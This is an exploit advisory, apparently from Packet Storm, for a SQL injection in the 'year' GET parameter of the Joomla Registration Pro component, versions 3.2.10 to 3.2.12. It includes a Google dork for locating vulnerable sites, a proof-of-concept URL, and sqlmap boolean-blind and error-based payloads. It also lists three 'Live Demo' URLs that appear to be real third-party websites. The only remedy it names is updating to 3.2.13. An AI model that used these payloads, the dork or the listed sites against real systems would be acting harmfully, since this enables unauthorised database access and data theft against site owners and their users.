Joomla Registration Pro component versions 3.2.10 through 3.2.12 suffer from a remote SQL injection vulnerability.
5f4aa4fd769e4f94be8e8128f79221da5832a7e1c4b3c5339021218b1523f45f######################
# ____ _ ____ ____ ___ ____ _ ____ _
# __ _| __ ) / \ | _ \ / ___|_ _| _ \| | |___ \/ |
# \ \/ / _ \ / _ \ | | | | | _ | || |_) | | __) | |
# > <| |_) / ___ \| |_| | |_| || || _ <| |___ / __/| |
# /_/\_\____/_/ \_\____/ \____|___|_| \_\_____|_____|_|
#
######################
# Exploit Title : Joomla com_registrationpro SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_registrationpro
# Vendor Homepage : http://www.joomlashowroom.com/
# version : 3.2.12 - 3.2.10
# Tested on: [ BACKBOX]
# skype:xbadgirl21
# Date: 10/08/2016
# video Proof : https://www.youtube.com/watch?v=GcEQMd7Dvl4
######################
# [+] DESCRIPTION :
######################
# [+] Event Registration Pro is a Joomla extension for accepting online
registrations and payments for events
# [+] training classes, conferences, and seminars.
# [+] AND an SQL injection has been Detected in this Joomla components
registrationpro
######################
# [+] Poc :
######################
# [year] Get Parameter Vulnerable To SQLi
#
http://127.0.0.1/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021
'
######################
# [+] SQLmap PoC:
######################
# Parameter: year (GET)
# Type: boolean-based blind
# Title: MySQL >= 5.0 boolean-based blind - Parameter replace
# Payload:
option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=(SELECT
(CASE WHEN (5274=5274) THEN 5274 ELSE 5274*(SELECT 5274 FROM
INFORMATION_SCHEMA.CHARACTER_SETS) END))
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
# Payload:
option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021
AND (SELECT 8657 FROM(SELECT #COUNT(*),CONCAT(0x71767a7171,(SELECT
(ELT(8657=8657,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
# ---
# GET parameter 'year' is vulnerable. Do you want to keep testing the
others (if any)? [y/N]
######################
# [!] Live Demo :
######################
http://www.k-noe.fr/achats/fr/registration/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021
http://gallery7theatre.com/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021
http://advancedbrain.com/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021
######################
# Solution
######################
# Just Update to the Last Version =00=> Version #: [ 3.2.13 ]
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed